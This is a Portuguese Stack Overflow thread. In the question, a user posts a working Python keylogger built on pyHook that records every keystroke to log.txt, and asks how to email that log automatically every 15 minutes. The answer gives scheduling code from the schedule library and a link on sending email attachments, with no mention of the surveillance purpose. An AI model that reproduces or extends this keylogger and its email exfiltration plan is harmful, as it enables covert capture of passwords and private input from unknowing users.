# Envio de e-mails em horário programado

Tags: python, email

Gostaria de saber como faço para que meu arquivo log.txt seja enviado para um email desejado em um horário definido (Ex: 15 min)? E depois de ser enviado, o processo reinicia e cria um novo log.txt.

```
import pythoncom, pyHook,

def registrar(evento):
    arquivo = open('log.txt', 'a')
    teclas = chr(evento.Ascii)
    arquivo.write(teclas)

hook = pyHook.HookManager()
hook.KeyDown = registrar
hook.HookKeyboard()

pythoncom.PumpMessages()
```

Comment: Welcome to SOpt, here we only speak portuguese. Maybe is better you ask in [SOen](http://stackoverflow.com).

Comment: Conheçe `CRON`?

Answer (score 3):

### [Schedule:](https://github.com/dbader/schedule)

"Schedule permite executar funções Python (ou qualquer outro callable) de forma períodica em intervalos pré determinados, usando uma sintaxe amigável".

Exemplo do repo no git:

`$ pip install schedule`

```
import schedule
import time

def job():
    print("I'm working...")

schedule.every(10).minutes.do(job)
schedule.every().hour.do(job)
schedule.every().day.at("10:30").do(job)
schedule.every().monday.do(job)
schedule.every().wednesday.at("13:15").do(job)

while True:
    schedule.run_pending()
    time.sleep(1)
```

### [Enviando emails](https://pt.stackoverflow.com/questions/212247/email-com-anexo-python/212277#212277):

Para envio de emails em python [veja esse tópico.](https://pt.stackoverflow.com/questions/212247/email-com-anexo-python/212277#212277)